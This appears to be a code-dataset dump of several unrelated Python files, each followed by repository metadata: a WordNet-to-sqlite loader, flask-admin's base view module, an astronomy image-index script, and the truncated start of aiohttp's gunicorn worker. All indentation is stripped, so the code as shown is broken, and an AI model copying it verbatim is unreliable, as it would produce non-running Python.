vframe['eng'][30] = "Somebody ----s somebody into V-ing something"
vframe['eng'][31] = "Somebody ----s something with something"
vframe['eng'][32] = "Somebody ----s INFINITIVE"
vframe['eng'][33] = "Somebody ----s VERB-ing"
vframe['eng'][34] = "It ----s that CLAUSE"
vframe['eng'][35] = "Something ----s INFINITIVE "
# Verb Frames Symbols per Verb_id
vframe['engsym'][1] = "☖ ~"
vframe['engsym'][2] = "☺ ~"
vframe['engsym'][3] = "It is ~ing"
vframe['engsym'][4] = "☖ is ~ing PP"
vframe['engsym'][5] = "☖ ~ ☖ Adj/N"
vframe['engsym'][6] = "☖ ~ Adj/N"
vframe['engsym'][7] = "☺ ~ Adj"
vframe['engsym'][8] = "☺ ~ ☖"
vframe['engsym'][9] = "☺ ~ ☺"
vframe['engsym'][10] = "☖ ~ ☺"
vframe['engsym'][11] = "☖ ~ ☖"
vframe['engsym'][12] = "☖ ~ to ☺"
vframe['engsym'][13] = "☺ ~ on ☖"
vframe['engsym'][14] = "☺ ~ ☺ ☖"
vframe['engsym'][15] = "☺ ~ ☖ to ☺"
vframe['engsym'][16] = "☺ ~ ☖ from ☺"
vframe['engsym'][17] = "☺ ~ ☺ with ☖"
vframe['engsym'][18] = "☺ ~ ☺ of ☖"
vframe['engsym'][19] = "☺ ~ ☖ on ☺"
vframe['engsym'][20] = "☺ ~ ☺ PP"
vframe['engsym'][21] = "☺ ~ ☖ PP"
vframe['engsym'][22] = "☺ ~ PP"
vframe['engsym'][23] = "☺'s (body part) ~"
vframe['engsym'][24] = "☺ ~ ☺ to INF"
vframe['engsym'][25] = "☺ ~ ☺ INF"
vframe['engsym'][26] = "☺ ~ that CLAUSE"
vframe['engsym'][27] = "☺ ~ to ☺"
vframe['engsym'][28] = "☺ ~ to INF"
vframe['engsym'][29] = "☺ ~ whether INF"
vframe['engsym'][30] = "☺ ~ ☺ into Ving ☖"
vframe['engsym'][31] = "☺ ~ ☖ with ☖"
vframe['engsym'][32] = "☺ ~ INF"
vframe['engsym'][33] = "☺ ~ V-ing"
vframe['engsym'][34] = "It ~ that CLAUSE"
vframe['engsym'][35] = "☖ ~ INF "
lexnames = """0 adj.all all adjective clusters
1 adj.pert relational adjectives (pertainyms)
2 adv.all all adverbs
3 noun.Tops unique beginner for nouns
4 noun.act nouns denoting acts or actions
5 noun.animal nouns denoting animals
6 noun.artifact nouns denoting man-made objects
7 noun.attribute nouns denoting attributes of people and objects
8 noun.body nouns denoting body parts
9 noun.cognition nouns denoting cognitive processes and contents
10 noun.communication nouns denoting communicative processes and contents
11 noun.event nouns denoting natural events
12 noun.feeling nouns denoting feelings and emotions
13 noun.food nouns denoting foods and drinks
14 noun.group nouns denoting groupings of people or objects
15 noun.location nouns denoting spatial position
16 noun.motive nouns denoting goals
17 noun.object nouns denoting natural objects (not man-made)
18 noun.person nouns denoting people
19 noun.phenomenon nouns denoting natural phenomena
20 noun.plant nouns denoting plants
21 noun.possession nouns denoting possession and transfer of possession
22 noun.process nouns denoting natural processes
23 noun.quantity nouns denoting quantities and units of measure
24 noun.relation nouns denoting relations between people or things or ideas
25 noun.shape nouns denoting two and three dimensional shapes
26 noun.state nouns denoting stable states of affairs
27 noun.substance nouns denoting substances
28 noun.time nouns denoting time and temporal relations
29 verb.body verbs of grooming, dressing and bodily care
30 verb.change verbs of size, temperature change, intensifying, etc.
31 verb.cognition verbs of thinking, judging, analyzing, doubting
32 verb.communication verbs of telling, asking, ordering, singing
33 verb.competition verbs of fighting, athletic activities
34 verb.consumption verbs of eating and drinking
35 verb.contact verbs of touching, hitting, tying, digging
36 verb.creation verbs of sewing, baking, painting, performing
37 verb.emotion verbs of feeling
38 verb.motion verbs of walking, flying, swimming
39 verb.perception verbs of seeing, hearing, feeling
40 verb.possession verbs of buying, selling, owning
41 verb.social verbs of political and social activities and events
42 verb.stative verbs of being, having, spatial relations
43 verb.weather verbs of raining, snowing, thawing, thundering
44 adj.ppl participial adjectives"""
# Short and Full Lexnames per Lexid
lexname = dd(lambda: dd(str))
for line in lexnames.split('\n'):
lexnlst = line.split('\t')
lexname['eng'][lexnlst[1]] = lexnlst[2]
lexname['id'][lexnlst[1]] = lexnlst[0]
################################################################
# OPEN omw.db
################################################################
con = sqlite3.connect(dbfile)
c = con.cursor()
################################################################
# GET PWN3.0-ILI ORIGINAL MAPPING
################################################################
f = open(ilimapfile, 'r')
ili_map = dict()
for line in f:
if line.strip() == "":
continue
else:
tab = line.split('\t')
pwn_ss = tab[1].strip()
ili_id = tab[0][1:].strip()
ili_map[pwn_ss] = ili_id
################################################################
# INSERT PROJECT / SRC / SRC_META DATA
################################################################
c.execute("""INSERT INTO proj (code, u)
VALUES (?,?)""", ['pwn',u])
c.execute("""SELECT MAX(id) FROM proj""")
proj_id = c.fetchone()[0]
sys.stderr.write('PWN was attributed ({}) as proj_id.\n'.format(proj_id))
c.execute("""INSERT INTO src (proj_id, version, u)
VALUES (?,?,?)""", [proj_id,'3.0', u])
c.execute("""SELECT MAX(id) FROM src""")
src_id = c.fetchone()[0]
sys.stderr.write('PWN30 was attributed (%s) as src_id.\n' % (src_id))
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'id', 'pwn', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'version', '3.0', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'label', 'Princeton Wordnet', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'url', 'https://wordnet.princeton.edu', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'description', 'WordNet is a large, open-source, lexical database of English. Nouns, verbs, adjectives and adverbs are grouped into sets of cognitive synonyms (synsets), each expressing a distinct concept. Synsets are interlinked by means of conceptual-semantic and lexical relations.', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'license', 'wordnet', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'language', 'en', u])
sys.stderr.write('PWN30 meta-data was added.\n')
################################################################
# INSERT (WN-EXTERNAL) RESOURCE DATA
################################################################
# FIXME!!! ADD SRC_META
c.execute("""INSERT INTO resource (code, u)
VALUES (?,?)""", ['pwn30-lexnames',u])
c.execute("""SELECT MAX(id) FROM resource""")
lexnames_resource_id = c.fetchone()[0]
c.execute("""INSERT INTO resource (code, u)
VALUES (?,?)""", ['pwn30-verbframes',u])
c.execute("""SELECT MAX(id) FROM resource""")
verbframes_resource_id = c.fetchone()[0]
################################################################
# INSERT LANG DATA (CODES AND NAMES)
################################################################
c.execute("""INSERT INTO lang (bcp47, iso639, u)
VALUES (?,?,?)""", ['en','eng',u])
c.execute("""INSERT INTO lang_name (lang_id, in_lang_id, name, u)
VALUES (1,1,'English',?)""", [u])
c.execute("""SELECT MAX(id) FROM lang""")
lang_id = c.fetchone()[0]
################################################################
# LOAD POS, SSREL, AND SREL DATA
################################################################
pos_id = dict()
c.execute("""SELECT id, tag FROM pos""")
rows = c.fetchall()
for r in rows:
pos_id[r[1]]=r[0]
ssrel_id = dict()
c.execute("""SELECT id, rel FROM ssrel""")
rows = c.fetchall()
for r in rows:
ssrel_id[r[1]]=r[0]
srel_id = dict()
c.execute("""SELECT id, rel FROM srel""")
rows = c.fetchall()
for r in rows:
srel_id[r[1]]=r[0]
################################################################
# ADD ENGLISH ENTRIES
################################################################
ssid = dict()
fid = dict()
wid=dict()
ss_lemma_sense_id = dict()
def ss2of(ss):
# FIXME!!!! 's' is getting through as the src_key on purpose!
return "%08d-%s" % (ss.offset(), ss.pos())
for ss in wn.all_synsets():
ili_id = int(ili_map[ss2of(ss)])
# (1) LOAD PWN CONCEPTS AS ILI CONCEPTS
if ss.instance_hypernyms():
kind = 2
c.execute("""INSERT INTO ili (id, kind_id, def, status_id,
origin_src_id, src_key, u)
VALUES (?,?,?,?,?,?,?)
""", (ili_id, kind, ss.definition(), 1,
src_id, ss2of(ss), u))
else:
kind = 1
c.execute("""INSERT INTO ili (id, kind_id, def, status_id,
origin_src_id, src_key, u)
VALUES (?,?,?,?,?,?,?)
""", (ili_id, kind, ss.definition(), 1,
src_id, ss2of(ss), u))
# (2) LOAD PWN CONCEPTS AS OMW CONCEPTS
pos = ss.pos()
pid = pos_id[pos.replace('s', 'a')]
# SYNSETS
c.execute("""INSERT INTO ss (ili_id, pos_id, u)
VALUES (?,?,?)
""", (ili_id, pid, u))
ss_id = c.lastrowid
c.execute("""INSERT INTO ss_src (ss_id, src_id, src_key, conf, u)
VALUES (?,?,?,?,?)
""", (ss_id, src_id, ss2of(ss), 1, u))
ssid[ss2of(ss)] = ss_id
c.execute("""INSERT INTO def (ss_id, lang_id, def, u)
VALUES (?,?,?,?)
""", (ss_id, lang_id, ss.definition(), u))
def_id = c.lastrowid
c.execute("""INSERT INTO def_src (def_id, src_id, conf, u)
VALUES (?,?,?,?)
""", (def_id, src_id, 1, u))
# EXAMPLES
exs = ss.examples()
for e in exs:
c.execute("""INSERT INTO ssexe (ss_id, lang_id, ssexe, u)
VALUES (?,?,?,?)
""", (ss_id, lang_id, e, u))
ex_id = c.lastrowid
c.execute("""INSERT INTO ssexe_src (ssexe_id, src_id, conf, u)
VALUES (?,?,?,?)
""", (ex_id, src_id, 1, u))
# INSERT FORMS, WORDS (SAME) and SENSES
for l in ss.lemmas():
# FORMS
form = l.name().replace('_', ' ')
if (pid, form) in fid:
form_id = fid[(pid, form)]
word_id= wid
else:
c.execute("""INSERT INTO f (lang_id, pos_id, lemma, u)
VALUES (?,?,?,?)
""", (lang_id, pid, form, u))
form_id = c.lastrowid
fid[(pid, form)] = form_id
c.execute("""INSERT INTO f_src (f_id, src_id, conf, u)
VALUES (?,?,?,?)
""", (form_id, src_id, 1, u))
# WORDS Only add for new form/pos pairs
c.execute("""INSERT INTO w (canon, u)
VALUES (?,?) """, (form_id, u))
word_id = c.lastrowid
wid[(pid, form)] = word_id
c.execute("""INSERT INTO wf_link (w_id, f_id, src_id, conf, u)
VALUES (?,?,?,?,?)
""", (word_id, form_id, src_id, 1, u))
# SENSES
word_id = wid[(pid, form)]
c.execute("""INSERT INTO s (ss_id, w_id, u)
VALUES (?,?,?) """, (ss_id, word_id, u))
s_id = c.lastrowid
c.execute("""INSERT INTO s_src (s_id, src_id, conf, u)
VALUES (?,?,?,?) """, (s_id, src_id, 1, u))
ss_lemma_sense_id[(ss,l)] = s_id
################################################################
# SECOND ROUND: INSERT RELATIONS
################################################################
# This now includes all relations as named in NLTK3.0
nltk_synlink_names = """also also_sees
attribute attributes
causes causes
entails entailments
hypernym hypernyms
hyponym hyponyms
instance_hypernym instance_hypernyms
instance_hyponym instance_hyponyms
holo_part part_holonyms
mero_part part_meronyms
similar similar_tos
holo_substance substance_holonyms
mero_substance substance_meronyms
holo_member member_holonyms
mero_member member_meronyms
domain_topic topic_domains
domain_region region_domains
exemplifies usage_domains"""
synlinks = dict()
for line in nltk_synlink_names.splitlines():
(k, v) = line.split('\t')
synlinks[k] = v
# list with relations not present in NLTK3.0
# but that can be inserted by finding their reverse
linkrev = dict()
linkrev['domain_topic'] = 'has_domain_topic'
linkrev['exemplifies'] = 'is_exemplified_by'
linkrev['domain_region'] = 'has_domain_region'
nltk_senslink_names = """antonym antonyms
pertainym pertainyms
derivation derivationally_related_forms"""
senslinks = dict()
for line in nltk_senslink_names.splitlines():
(k, v) = line.split('\t')
senslinks[k] = v
for ss in wn.all_synsets():
pos = ss.pos()
pid = pos_id[pos.replace('s', 'a')]
# SSREL
for r in synlinks.keys():
for ss2 in getattr(ss, synlinks[r])():
c.execute("""INSERT INTO sslink (ss1_id, ssrel_id, ss2_id, u)
VALUES (?,?,?,?)""",
(ssid[ss2of(ss)], ssrel_id[r], ssid[ss2of(ss2)], u))
sslink_id = c.lastrowid
c.execute("""INSERT INTO sslink_src (sslink_id, src_id, conf, lang_id, u)
VALUES (?,?,?,?,?)""",
(sslink_id, src_id, 1, lang_id, u))
if r in linkrev.keys(): # insert the reverse relation
c.execute("""INSERT INTO sslink (ss1_id, ssrel_id, ss2_id, u)
VALUES (?,?,?,?)""",
(ssid[ss2of(ss2)], ssrel_id[linkrev[r]], ssid[ss2of(ss)], u))
sslink_id = c.lastrowid
c.execute("""INSERT INTO sslink_src (sslink_id, src_id, conf, lang_id, u)
VALUES (?,?,?,?,?)""",
(sslink_id, src_id, 1, lang_id, u))
# SS LEXNAMES
lxn = ss.lexname()
c.execute("""INSERT INTO ssxl (ss_id, resource_id, x1, x2, x3, u)
VALUES (?,?,?,?,?,?)
""", (ssid[ss2of(ss)], lexnames_resource_id, lexname['id'][lxn],
lxn, lexname['eng'][lxn], u))
# SS VERBFRAMES
sframes = ss.frame_ids()
for frame in sframes:
c.execute("""INSERT INTO ssxl (ss_id, resource_id, x1, x2, x3, u)
VALUES (?,?,?,?,?,?)
""", (ssid[ss2of(ss)], verbframes_resource_id, frame,
vframe['eng'][frame], vframe['engsym'][frame], u))
# SENSE LINKS
for l1 in ss.lemmas():
s1_id = ss_lemma_sense_id[(ss,l1)]
lframeids = l1.frame_ids() # lemma frames
for frame in lframeids:
c.execute("""INSERT INTO sxl (s_id, resource_id, x1, x2, x3, u)
VALUES (?,?,?,?,?,?)
""", (s1_id, verbframes_resource_id, frame,
vframe['eng'][frame], vframe['engsym'][frame], u))
for r in senslinks:
for l2 in getattr(l1, senslinks[r])():
s2_id = ss_lemma_sense_id[(l2.synset(),l2)]
c.execute("""INSERT INTO slink (s1_id, srel_id, s2_id, u)
VALUES (?,?,?,?)""",
(s1_id, srel_id[r], s2_id, u))
slink_id = c.lastrowid
c.execute("""INSERT INTO slink_src (slink_id, src_id, conf, u)
VALUES (?,?,?,?)""",
(slink_id, src_id, 1, u))
con.commit()
con.close()
sys.stderr.write('Loaded PWN30!')
|
mit
| -2,236,290,472,514,885,400
| 32.240367
| 333
| 0.54278
| false
| 2.982058
| false
| false
| false
|
Kha/flask-admin
|
flask_admin/base.py
|
1
|
20999
|
import os.path as op
from functools import wraps
from flask import Blueprint, current_app, render_template, abort, g, url_for
from flask_admin import babel
from flask_admin._compat import with_metaclass, as_unicode
from flask_admin import helpers as h
# For compatibility reasons import MenuLink
from flask_admin.menu import MenuCategory, MenuView, MenuLink
def expose(url='/', methods=('GET',)):
"""
Use this decorator to expose views in your view classes.
:param url:
Relative URL for the view
:param methods:
Allowed HTTP methods. By default only GET is allowed.
"""
def wrap(f):
if not hasattr(f, '_urls'):
f._urls = []
f._urls.append((url, methods))
return f
return wrap
def expose_plugview(url='/'):
"""
Decorator to expose Flask's pluggable view classes
(``flask.views.View`` or ``flask.views.MethodView``).
:param url:
Relative URL for the view
.. versionadded:: 1.0.4
"""
def wrap(v):
handler = expose(url, v.methods)
if hasattr(v, 'as_view'):
return handler(v.as_view(v.__name__))
else:
return handler(v)
return wrap
# Base views
def _wrap_view(f):
# Avoid wrapping view method twice
if hasattr(f, '_wrapped'):
return f
@wraps(f)
def inner(self, *args, **kwargs):
# Store current admin view
h.set_current_view(self)
# Check if administrative piece is accessible
abort = self._handle_view(f.__name__, **kwargs)
if abort is not None:
return abort
return self._run_view(f, *args, **kwargs)
inner._wrapped = True
return inner
class AdminViewMeta(type):
"""
View metaclass.
Does some precalculations (like getting list of view methods from the class) to avoid
calculating them for each view class instance.
"""
def __init__(cls, classname, bases, fields):
type.__init__(cls, classname, bases, fields)
# Gather exposed views
cls._urls = []
cls._default_view = None
for p in dir(cls):
attr = getattr(cls, p)
if hasattr(attr, '_urls'):
# Collect methods
for url, methods in attr._urls:
cls._urls.append((url, p, methods))
if url == '/':
cls._default_view = p
# Wrap views
setattr(cls, p, _wrap_view(attr))
class BaseViewClass(object):
pass
class BaseView(with_metaclass(AdminViewMeta, BaseViewClass)):
"""
Base administrative view.
Derive from this class to implement your administrative interface piece. For example::
from flask_admin import BaseView, expose
class MyView(BaseView):
@expose('/')
def index(self):
return 'Hello World!'
Icons can be added to the menu by using `menu_icon_type` and `menu_icon_value`. For example::
admin.add_view(MyView(name='My View', menu_icon_type='glyph', menu_icon_value='glyphicon-home'))
"""
@property
def _template_args(self):
"""
Extra template arguments.
If you need to pass some extra parameters to the template,
you can override particular view function, contribute
arguments you want to pass to the template and call parent view.
These arguments are local for this request and will be discarded
in the next request.
Any value passed through ``_template_args`` will override whatever
parent view function passed to the template.
For example::
class MyAdmin(ModelView):
@expose('/')
def index(self):
self._template_args['name'] = 'foobar'
self._template_args['code'] = '12345'
super(MyAdmin, self).index()
"""
args = getattr(g, '_admin_template_args', None)
if args is None:
args = g._admin_template_args = dict()
return args
def __init__(self, name=None, category=None, endpoint=None, url=None,
static_folder=None, static_url_path=None,
menu_class_name=None, menu_icon_type=None, menu_icon_value=None):
"""
Constructor.
:param name:
Name of this view. If not provided, will default to the class name.
:param category:
View category. If not provided, this view will be shown as a top-level menu item. Otherwise, it will
be in a submenu.
:param endpoint:
Base endpoint name for the view. For example, if there's a view method called "index" and
endpoint is set to "myadmin", you can use `url_for('myadmin.index')` to get the URL to the
view method. Defaults to the class name in lower case.
:param url:
Base URL. If provided, affects how URLs are generated. For example, if the url parameter
is "test", the resulting URL will look like "/admin/test/". If not provided, will
use endpoint as a base url. However, if URL starts with '/', absolute path is assumed
and '/admin/' prefix won't be applied.
:param static_url_path:
Static URL Path. If provided, this specifies the path to the static url directory.
:param menu_class_name:
Optional class name for the menu item.
:param menu_icon_type:
Optional icon. Possible icon types:
- `flask_admin.consts.ICON_TYPE_GLYPH` - Bootstrap glyph icon
- `flask_admin.consts.ICON_TYPE_FONT_AWESOME` - Font Awesome icon
- `flask_admin.consts.ICON_TYPE_IMAGE` - Image relative to Flask static directory
- `flask_admin.consts.ICON_TYPE_IMAGE_URL` - Image with full URL
:param menu_icon_value:
Icon glyph name or URL, depending on `menu_icon_type` setting
"""
self.name = name
self.category = category
self.endpoint = self._get_endpoint(endpoint)
self.url = url
self.static_folder = static_folder
self.static_url_path = static_url_path
self.menu = None
self.menu_class_name = menu_class_name
self.menu_icon_type = menu_icon_type
self.menu_icon_value = menu_icon_value
# Initialized from create_blueprint
self.admin = None
self.blueprint = None
# Default view
if self._default_view is None:
raise Exception(u'Attempted to instantiate admin view %s without default view' % self.__class__.__name__)
def _get_endpoint(self, endpoint):
"""
Generate Flask endpoint name. By default converts class name to lower case if endpoint is
not explicitly provided.
"""
if endpoint:
return endpoint
return self.__class__.__name__.lower()
def _get_view_url(self, admin, url):
"""
Generate URL for the view. Override to change default behavior.
"""
if url is None:
if admin.url != '/':
url = '%s/%s' % (admin.url, self.endpoint)
else:
if self == admin.index_view:
url = '/'
else:
url = '/%s' % self.endpoint
else:
if not url.startswith('/'):
url = '%s/%s' % (admin.url, url)
return url
def create_blueprint(self, admin):
"""
Create Flask blueprint.
"""
# Store admin instance
self.admin = admin
# If the static_url_path is not provided, use the admin's
if not self.static_url_path:
self.static_url_path = admin.static_url_path
# Generate URL
self.url = self._get_view_url(admin, self.url)
# If we're working from the root of the site, set prefix to None
if self.url == '/':
self.url = None
# prevent admin static files from conflicting with flask static files
if not self.static_url_path:
self.static_folder = 'static'
self.static_url_path = '/static/admin'
# If name is not povided, use capitalized endpoint name
if self.name is None:
self.name = self._prettify_class_name(self.__class__.__name__)
# Create blueprint and register rules
self.blueprint = Blueprint(self.endpoint, __name__,
url_prefix=self.url,
subdomain=self.admin.subdomain,
template_folder=op.join('templates', self.admin.template_mode),
static_folder=self.static_folder,
static_url_path=self.static_url_path)
for url, name, methods in self._urls:
self.blueprint.add_url_rule(url,
name,
getattr(self, name),
methods=methods)
return self.blueprint
def render(self, template, **kwargs):
"""
Render template
:param template:
Template path to render
:param kwargs:
Template arguments
"""
# Store self as admin_view
kwargs['admin_view'] = self
kwargs['admin_base_template'] = self.admin.base_template
# Provide i18n support even if flask-babel is not installed
# or enabled.
kwargs['_gettext'] = babel.gettext
kwargs['_ngettext'] = babel.ngettext
kwargs['h'] = h
# Expose get_url helper
kwargs['get_url'] = self.get_url
# Expose config info
kwargs['config'] = current_app.config
# Contribute extra arguments
kwargs.update(self._template_args)
return render_template(template, **kwargs)
def _prettify_class_name(self, name):
"""
Split words in PascalCase string into separate words.
:param name:
String to prettify
"""
return h.prettify_class_name(name)
def is_visible(self):
"""
Override this method if you want dynamically hide or show administrative views
from Flask-Admin menu structure
By default, item is visible in menu.
Please note that item should be both visible and accessible to be displayed in menu.
"""
return True
def is_accessible(self):
"""
Override this method to add permission checks.
Flask-Admin does not make any assumptions about the authentication system used in your application, so it is
up to you to implement it.
By default, it will allow access for everyone.
"""
return True
def _handle_view(self, name, **kwargs):
"""
This method will be executed before calling any view method.
It will execute the ``inaccessible_callback`` if the view is not
accessible.
:param name:
View function name
:param kwargs:
View function arguments
"""
if not self.is_accessible():
return self.inaccessible_callback(name, **kwargs)
def _run_view(self, fn, *args, **kwargs):
"""
This method will run actual view function.
While it is similar to _handle_view, can be used to change
arguments that are passed to the view.
:param fn:
View function
:param kwargs:
Arguments
"""
return fn(self, *args, **kwargs)
def inaccessible_callback(self, name, **kwargs):
"""
Handle the response to inaccessible views.
By default, it throw HTTP 403 error. Override this method to
customize the behaviour.
"""
return abort(403)
def get_url(self, endpoint, **kwargs):
"""
Generate URL for the endpoint. If you want to customize URL generation
logic (persist some query string argument, for example), this is
right place to do it.
:param endpoint:
Flask endpoint name
:param kwargs:
Arguments for `url_for`
"""
return url_for(endpoint, **kwargs)
@property
def _debug(self):
if not self.admin or not self.admin.app:
return False
return self.admin.app.debug
class AdminIndexView(BaseView):
"""
Default administrative interface index page when visiting the ``/admin/`` URL.
It can be overridden by passing your own view class to the ``Admin`` constructor::
class MyHomeView(AdminIndexView):
@expose('/')
def index(self):
arg1 = 'Hello'
return self.render('admin/myhome.html', arg1=arg1)
admin = Admin(index_view=MyHomeView())
Also, you can change the root url from /admin to / with the following::
admin = Admin(
app,
index_view=AdminIndexView(
name='Home',
template='admin/myhome.html',
url='/'
)
)
Default values for the index page are:
* If a name is not provided, 'Home' will be used.
* If an endpoint is not provided, will default to ``admin``
* Default URL route is ``/admin``.
* Automatically associates with static folder.
* Default template is ``admin/index.html``
"""
def __init__(self, name=None, category=None,
endpoint=None, url=None,
template='admin/index.html',
menu_class_name=None,
menu_icon_type=None,
menu_icon_value=None):
super(AdminIndexView, self).__init__(name or babel.lazy_gettext('Home'),
category,
endpoint or 'admin',
url or '/admin',
'static',
menu_class_name=menu_class_name,
menu_icon_type=menu_icon_type,
menu_icon_value=menu_icon_value)
self._template = template
@expose()
def index(self):
return self.render(self._template)
class Admin(object):
"""
Collection of the admin views. Also manages menu structure.
"""
def __init__(self, app=None, name=None,
url=None, subdomain=None,
index_view=None,
translations_path=None,
endpoint=None,
static_url_path=None,
base_template=None,
template_mode=None,
category_icon_classes=None):
"""
Constructor.
:param app:
Flask application object
:param name:
Application name. Will be displayed in the main menu and as a page title. Defaults to "Admin"
:param url:
Base URL
:param subdomain:
Subdomain to use
:param index_view:
Home page view to use. Defaults to `AdminIndexView`.
:param translations_path:
Location of the translation message catalogs. By default will use the translations
shipped with Flask-Admin.
:param endpoint:
Base endpoint name for index view. If you use multiple instances of the `Admin` class with
a single Flask application, you have to set a unique endpoint name for each instance.
:param static_url_path:
Static URL Path. If provided, this specifies the default path to the static url directory for
all its views. Can be overridden in view configuration.
:param base_template:
Override base HTML template for all static views. Defaults to `admin/base.html`.
:param template_mode:
Base template path. Defaults to `bootstrap2`. If you want to use
Bootstrap 3 integration, change it to `bootstrap3`.
:param category_icon_classes:
A dict of category names as keys and html classes as values to be added to menu category icons.
Example: {'Favorites': 'glyphicon glyphicon-star'}
"""
self.app = app
self.translations_path = translations_path
self._views = []
self._menu = []
self._menu_categories = dict()
self._menu_links = []
if name is None:
name = 'Admin'
self.name = name
self.index_view = index_view or AdminIndexView(endpoint=endpoint, url=url)
self.endpoint = endpoint or self.index_view.endpoint
self.url = url or self.index_view.url
self.static_url_path = static_url_path
self.subdomain = subdomain
self.base_template = base_template or 'admin/base.html'
self.template_mode = template_mode or 'bootstrap2'
self.category_icon_classes = category_icon_classes or dict()
# Add predefined index view
self.add_view(self.index_view)
# Register with application
if app is not None:
self._init_extension()
def add_view(self, view):
"""
Add a view to the collection.
:param view:
View to add.
"""
# Add to views
self._views.append(view)
# If app was provided in constructor, register view with Flask app
if self.app is not None:
self.app.register_blueprint(view.create_blueprint(self))
self._add_view_to_menu(view)
def add_link(self, link):
"""
Add link to menu links collection.
:param link:
Link to add.
"""
if link.category:
self._add_menu_item(link, link.category)
else:
self._menu_links.append(link)
def _add_menu_item(self, menu_item, target_category):
if target_category:
cat_text = as_unicode(target_category)
category = self._menu_categories.get(cat_text)
# create a new menu category if one does not exist already
if category is None:
category = MenuCategory(target_category)
category.class_name = self.category_icon_classes.get(cat_text)
self._menu_categories[cat_text] = category
self._menu.append(category)
category.add_child(menu_item)
else:
self._menu.append(menu_item)
def _add_view_to_menu(self, view):
"""
Add a view to the menu tree
:param view:
View to add
"""
self._add_menu_item(MenuView(view.name, view), view.category)
def get_category_menu_item(self, name):
return self._menu_categories.get(name)
def init_app(self, app):
"""
Register all views with the Flask application.
:param app:
Flask application instance
"""
self.app = app
self._init_extension()
# Register views
for view in self._views:
app.register_blueprint(view.create_blueprint(self))
def _init_extension(self):
if not hasattr(self.app, 'extensions'):
self.app.extensions = dict()
admins = self.app.extensions.get('admin', [])
for p in admins:
if p.endpoint == self.endpoint:
raise Exception(u'Cannot have two Admin() instances with same'
u' endpoint name.')
if p.url == self.url and p.subdomain == self.subdomain:
raise Exception(u'Cannot assign two Admin() instances with same'
u' URL and subdomain to the same application.')
admins.append(self)
self.app.extensions['admin'] = admins
def menu(self):
"""
Return the menu hierarchy.
"""
return self._menu
def menu_links(self):
"""
Return menu links.
"""
return self._menu_links
|
bsd-3-clause
| -4,105,701,313,336,007,000
| 32.437898
| 120
| 0.54455
| false
| 4.672675
| false
| false
| false
|
barentsen/iphas-dr2
|
scripts/release-preparation/augment-image-metadata.py
|
1
|
3046
|
"""Script to create a user-friendly index of IPHAS image meta data.
"""
import numpy as np
from astropy.table import Table
from astropy.table import Column
from dr2.constants import IPHASQC
# Index of images found by the DR2 pipeline
# ie. produced by dr2.images.prepare_images()
t = Table.read('iphas-images-pipeline.fits')
# Run 376022 on the disk received from CASU is a corrupt file
t.remove_row(np.argwhere(t['run'] == 376022)[0][0])
# Run 367744 appeared twice in iphas-qc.fits
t.remove_rows(np.argwhere(t['run'] == 367744)[4:])
# Add the URL of the image location
urldata = ['http://www.iphas.org/data/images/'+name[0:4]+'/'+name for name in t['filename']]
url = Column(name='url', data=urldata)
t.add_column(url, 0)
t.remove_column('filename')
# Load auxillary data from the IPHAS-QC file
runs = np.concatenate((IPHASQC['run_r'], IPHASQC['run_i'], IPHASQC['run_ha']))
fields = np.concatenate((IPHASQC['id'], IPHASQC['id'], IPHASQC['id']))
qflags = np.concatenate((IPHASQC['qflag'], IPHASQC['qflag'], IPHASQC['qflag']))
qcproblems = np.concatenate((IPHASQC['problems'], IPHASQC['problems'], IPHASQC['problems']))
depth5sig = np.concatenate((IPHASQC['r5sig_judged'],
IPHASQC['i5sig_judged'],
IPHASQC['h5sig_judged']))
field_dict = dict(zip(runs, fields))
qflag_dict = dict(zip(runs, qflags))
qcproblems_dict = dict(zip(runs, qcproblems))
depth5sig_dict = dict(zip(runs, depth5sig))
# Add the IPHAS field number
field = Column(name='fieldid', data=[field_dict[r] for r in t['run']])
t.add_column(field)
# Add the DR2 quality grade
qcgrade = Column(name='qcgrade', data=[qflag_dict[r] for r in t['run']])
t.add_column(qcgrade)
# Add the 'quality problems' summary
qcproblems = Column(name='qcproblems', data=[qcproblems_dict[r] for r in t['run']])
t.add_column(qcproblems)
# Add the 5-sigma detection limit
depth = Column(name='depth', data=[depth5sig_dict[r] for r in t['run']])
t.add_column(depth)
# Limit the number of decimals in the ascii output:
t['ra'].format = '{0:.3f}'
t['dec'].format = '{0:.3f}'
t.remove_column('airmass')
t.sort(['run', 'ccd'])
# We will export the resulting table to FITS, ASCII, and SQLITE
# First, export to FITS
columns = ['run', 'ccd', 'url', 'ra', 'dec', 'band', 'utstart',
'fieldid', 'in_dr2', 'qcgrade', 'qcproblems',
'exptime', 'seeing', 'elliptic', 'skylevel', 'skynoise',
'depth', 'photzp', 'confmap',
'ra_min', 'ra_max', 'dec_min', 'dec_max']
t[columns].write('iphas-images.fits.gz', overwrite=True)
# Export to ASCII
t['url', 'ra', 'dec', 'band', 'fieldid', 'in_dr2', 'qcgrade'].write('iphas-images.txt', format='ascii.fixed_width')
# Export to SQLITE (using atpy as astropy doesn't support sqlite yet)
import atpy
tbl = atpy.Table('iphas-images.fits.gz', name='images')
tbl.write('sqlite', 'iphas-images.sqlite', overwrite=True)
# For fast queries, you might want to do:
# CREATE INDEX images_ra_min_idx ON images(ra_min);
# CREATE INDEX images_ra_max_idx ON images(ra_max);
# VACUUM;
|
mit
| 7,983,065,310,120,781,000
| 37.0875
| 115
| 0.673342
| false
| 2.857411
| false
| false
| false
|
aio-libs/aiohttp
|
aiohttp/worker.py
|
1
|
7750
|
"""Async gunicorn worker for aiohttp.web"""
import asyncio
import os
import re
import signal
import sys
from types import FrameType
from typing import Any, Awaitable, Callable, Optional, Union # noqa
from gunicorn.config import AccessLogFormat as GunicornAccessLogFormat
from gunicorn.workers import base
from aiohttp import web
from .helpers import set_result
from .web_app import Application
from .web_log import AccessLogger
try:
import ssl
SSLContext = ssl.SSLContext
except ImportError: # pragma: no cover
